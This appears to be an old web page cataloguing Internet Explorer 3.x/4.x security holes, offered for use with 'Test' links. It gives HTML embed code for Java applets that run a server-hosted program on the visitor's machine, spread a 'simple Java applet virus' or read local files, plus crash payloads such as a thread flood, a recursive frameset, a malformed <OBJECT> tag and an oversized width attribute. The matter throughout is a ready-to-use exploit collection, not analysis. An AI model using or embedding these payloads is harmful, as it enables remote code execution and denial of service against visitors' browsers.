M$IE Holes collection.


"Native JRTL methods call" security hole in M$IE3.0x JavaVM
| Subject | Example HTML code for exploit | Source code | Compiled (binary) code | Test subj ;) |
|---|---|---|---|---|
| Execute a program stored on the server at the remote client host | <applet code="RemotExec.class" width=1 height=1> <param name=exec value="elchtest.exe"> </applet> | RemotExec.java | | Test |
| Simple Java applet virus (lives in Win95+M$IE 3.0x+Personal Web Server) | <applet code="shadow.class" width=1 height=1> </applet> | shadow.java | | Test |
| Get access to the local file system from a Java applet (some functions not implemented) | <applet code="Test.class" width=640 height=480> </applet> | Test.java | | Test |

Threads Flood (M$IE 3.0x/4.0x)
| Subject | Example HTML code for exploit | Source code | Compiled (binary) code | Test subj ;) |
|---|---|---|---|---|
| Threads flood | <applet code="fl00d.class" width=1 height=1> </applet> | fl00d.java | fl00d.class | Test |

Frame crash (M$IE 4.0x)
| Subject | Example HTML code for exploit | Test subj ;) |
|---|---|---|
| Frame crash | <frameset> <frame src="framefl00d.html"> </frameset> | Test |

"Ghosting" attack (M$IE 4.0x+Windows98 Active Desktop)
| Subject | Example HTML code for exploit | Source code | Compiled (binary) code | Test subj ;) |
|---|---|---|---|---|
| "Ghosting" attack | <applet code="zealand.class" width=1600 height=800> </applet> | zealand.java | zealand.class | Test |

<OBJECT> tag crash (M$IE 4.0x)
| Subject | Example HTML code for exploit | Test subj ;) |
|---|---|---|
| <OBJECT> tag crash | <OBJECT CLASSID=#> </OBJECT> | Test |

Big "width=" crash (M$IE 4.0x)
| Subject | Example HTML code for exploit | Test subj ;) |
|---|---|---|
| Big "width=" crash | <img src="/icons/burst.gif" width=0000... (string > 100 chars)> | Test |

...mail me...
...to be continued...